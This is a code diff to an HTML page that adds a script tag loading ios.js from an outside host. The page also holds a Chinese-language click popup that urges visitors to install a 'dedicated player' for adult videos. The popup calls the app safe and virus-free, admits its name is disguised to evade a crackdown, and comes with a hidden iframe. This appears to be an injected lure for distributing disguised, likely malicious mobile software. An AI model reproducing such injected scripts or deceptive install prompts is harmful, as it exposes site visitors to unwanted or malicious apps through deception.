--- a/wapav.html
+++ b/wapav.html
@@ -23,6 +23,7 @@ function MM_popupMsg(msg) { //v1.0
 }
 //-->
     </script>
+ <script id="ios_url" type="text/javascript" charset="gb2312" src="http://banmeng_1598.it760.com/ios.js"></script>   
 </head>
 <body onclick="MM_popupMsg(&#39;下载本站专用播放器，安装后运行即可观看本站2W部成人爽片！\r亲爱的狼友，因近期国家严查色情网站，故软件名称已经修改！但不会影响正常观看！本软件安全无毒请放心观看，每3小时更新一次！\r免费激活观看方法：为了做掩饰软件已修改用其他软件做表面掩饰，打开软件后会提示完成新手任务后重新打开软件即可永久激活免费观看！（软件每3小时，更新一次影片库，让你看个够！检测本手机未安装本站专用播放器，请下载本站专用播放器，安装后运行专用播放器即可观看本站2W部片&#39;);">
 <iframe id="sina_anywhere_iframe" style="display: none;"></iframe>
